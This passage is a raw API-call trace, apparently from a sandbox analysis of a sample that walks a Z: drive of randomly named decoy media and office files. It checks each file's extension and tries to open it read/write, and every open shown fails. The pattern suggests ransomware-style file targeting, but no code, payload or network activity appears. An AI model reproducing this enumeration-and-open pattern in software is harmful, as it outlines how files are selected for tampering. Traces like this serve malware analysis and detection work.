(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.606] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13821, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eDeo4.wav", cAlternateFileName="")) returned 1 [0186.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.606] PathFindExtensionW (pszPath="Z:\\eDeo4.wav") returned=".wav" [0186.611] CreateFileW (lpFileName="Z:\\eDeo4.wav" (normalized: "z:\\edeo4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.612] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13fca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EYzpuUkMw0nV.m4a", cAlternateFileName="")) returned 1 [0186.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.612] PathFindExtensionW (pszPath="Z:\\EYzpuUkMw0nV.m4a") returned=".m4a" [0186.616] CreateFileW (lpFileName="Z:\\EYzpuUkMw0nV.m4a" (normalized: "z:\\eyzpuukmw0nv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.617] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x742f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D91tIUAsFS.mkv", cAlternateFileName="")) returned 1 [0186.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.618] PathFindExtensionW (pszPath="Z:\\D91tIUAsFS.mkv") returned=".mkv" [0186.621] CreateFileW (lpFileName="Z:\\D91tIUAsFS.mkv" (normalized: "z:\\d91tiuasfs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.623] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1586e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y4KxErTVQYWoCrSXjxG.odt", cAlternateFileName="")) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.623] PathFindExtensionW (pszPath="Z:\\y4KxErTVQYWoCrSXjxG.odt") returned=".odt" [0186.627] CreateFileW (lpFileName="Z:\\y4KxErTVQYWoCrSXjxG.odt" (normalized: "z:\\y4kxertvqywocrsxjxg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.629] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x138c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D3bOsFLtbMJgWgQv8Xrs.m4a", cAlternateFileName="")) returned 1 [0186.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.629] PathFindExtensionW (pszPath="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a") returned=".m4a" [0186.633] CreateFileW (lpFileName="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a" (normalized: "z:\\d3bosfltbmjgwgqv8xrs.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.635] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc139, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBDptFA1xz7efpLkn.mp4", cAlternateFileName="")) returned 1 [0186.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.635] PathFindExtensionW (pszPath="Z:\\VBDptFA1xz7efpLkn.mp4") returned=".mp4" [0186.639] CreateFileW (lpFileName="Z:\\VBDptFA1xz7efpLkn.mp4" (normalized: "z:\\vbdptfa1xz7efplkn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.641] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xafe5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JmVSFmaxSYp.wav", cAlternateFileName="")) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.641] PathFindExtensionW (pszPath="Z:\\JmVSFmaxSYp.wav") returned=".wav" [0186.647] CreateFileW (lpFileName="Z:\\JmVSFmaxSYp.wav" (normalized: "z:\\jmvsfmaxsyp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.649] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15403, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwFhNksqnjKFSaL.doc", cAlternateFileName="")) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.649] PathFindExtensionW (pszPath="Z:\\WwFhNksqnjKFSaL.doc") returned=".doc" [0186.654] CreateFileW (lpFileName="Z:\\WwFhNksqnjKFSaL.doc" (normalized: "z:\\wwfhnksqnjkfsal.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.656] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18342, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hMbpJsxUxLqdU43X.rtf", cAlternateFileName="")) returned 1 [0186.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.656] PathFindExtensionW (pszPath="Z:\\hMbpJsxUxLqdU43X.rtf") returned=".rtf" [0186.661] CreateFileW (lpFileName="Z:\\hMbpJsxUxLqdU43X.rtf" (normalized: "z:\\hmbpjsxuxlqdu43x.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.663] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7967, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mUs3U.jpg", cAlternateFileName="")) returned 1 [0186.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.663] PathFindExtensionW (pszPath="Z:\\mUs3U.jpg") returned=".jpg" [0186.669] CreateFileW (lpFileName="Z:\\mUs3U.jpg" (normalized: "z:\\mus3u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.671] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1057a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="noIQIeDYAhP.m4a", cAlternateFileName="")) returned 1 [0186.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.671] PathFindExtensionW (pszPath="Z:\\noIQIeDYAhP.m4a") returned=".m4a" [0186.675] CreateFileW (lpFileName="Z:\\noIQIeDYAhP.m4a" (normalized: "z:\\noiqiedyahp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.676] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V7AkBxJ.rtf", cAlternateFileName="")) returned 1 [0186.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.677] PathFindExtensionW (pszPath="Z:\\V7AkBxJ.rtf") returned=".rtf" [0186.681] CreateFileW (lpFileName="Z:\\V7AkBxJ.rtf" (normalized: "z:\\v7akbxj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.684] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXMaDbExzV3GNxn.rtf", cAlternateFileName="")) returned 1 [0186.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.684] PathFindExtensionW (pszPath="Z:\\nXMaDbExzV3GNxn.rtf") returned=".rtf" [0186.689] CreateFileW (lpFileName="Z:\\nXMaDbExzV3GNxn.rtf" (normalized: "z:\\nxmadbexzv3gnxn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.691] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05sv4vlauTjO82QKoH.odp", cAlternateFileName="")) returned 1 [0186.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.691] PathFindExtensionW (pszPath="Z:\\05sv4vlauTjO82QKoH.odp") returned=".odp" [0186.696] CreateFileW (lpFileName="Z:\\05sv4vlauTjO82QKoH.odp" (normalized: "z:\\05sv4vlautjo82qkoh.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.698] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e0Lune6IQDhr.swf", cAlternateFileName="")) returned 1 [0186.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.698] PathFindExtensionW (pszPath="Z:\\e0Lune6IQDhr.swf") returned=".swf" [0186.703] CreateFileW (lpFileName="Z:\\e0Lune6IQDhr.swf" (normalized: "z:\\e0lune6iqdhr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.704] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xef2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UWPd5V722.jpg", cAlternateFileName="")) returned 1 [0186.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.705] PathFindExtensionW (pszPath="Z:\\UWPd5V722.jpg") returned=".jpg" [0186.709] CreateFileW (lpFileName="Z:\\UWPd5V722.jpg" (normalized: "z:\\uwpd5v722.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.711] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3vXkT9bZW2wQG2nOsz.flv", cAlternateFileName="")) returned 1 [0186.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.711] PathFindExtensionW (pszPath="Z:\\3vXkT9bZW2wQG2nOsz.flv") returned=".flv" [0186.715] CreateFileW (lpFileName="Z:\\3vXkT9bZW2wQG2nOsz.flv" (normalized: "z:\\3vxkt9bzw2wqg2nosz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.719] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x173b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rSvaTPcyuRZ.avi", cAlternateFileName="")) returned 1 [0186.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.719] PathFindExtensionW (pszPath="Z:\\rSvaTPcyuRZ.avi") returned=".avi" [0186.724] CreateFileW (lpFileName="Z:\\rSvaTPcyuRZ.avi" (normalized: "z:\\rsvatpcyurz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.726] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x52b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BEWCWMGvP7.odp", cAlternateFileName="")) returned 1 [0186.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.726] PathFindExtensionW (pszPath="Z:\\BEWCWMGvP7.odp") returned=".odp" [0186.731] CreateFileW (lpFileName="Z:\\BEWCWMGvP7.odp" (normalized: "z:\\bewcwmgvp7.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.733] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb7f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERBbBrh6.mp3", cAlternateFileName="")) returned 1 [0186.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.733] PathFindExtensionW (pszPath="Z:\\ERBbBrh6.mp3") returned=".mp3" [0186.737] CreateFileW (lpFileName="Z:\\ERBbBrh6.mp3" (normalized: "z:\\erbbbrh6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.738] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x968a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYeVSPPEdjtBCAgcD.m4a", cAlternateFileName="")) returned 1 [0186.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.738] PathFindExtensionW (pszPath="Z:\\cYeVSPPEdjtBCAgcD.m4a") returned=".m4a" [0186.742] CreateFileW (lpFileName="Z:\\cYeVSPPEdjtBCAgcD.m4a" (normalized: "z:\\cyevsppedjtbcagcd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.744] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf715, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t0dVU7jjqdjfnF7OmqO.png", cAlternateFileName="")) returned 1 [0186.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.744] PathFindExtensionW (pszPath="Z:\\t0dVU7jjqdjfnF7OmqO.png") returned=".png" [0186.748] CreateFileW (lpFileName="Z:\\t0dVU7jjqdjfnF7OmqO.png" (normalized: "z:\\t0dvu7jjqdjfnf7omqo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.750] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc295, dwReserved0=0xa0000003, dwReserved1=0x0, 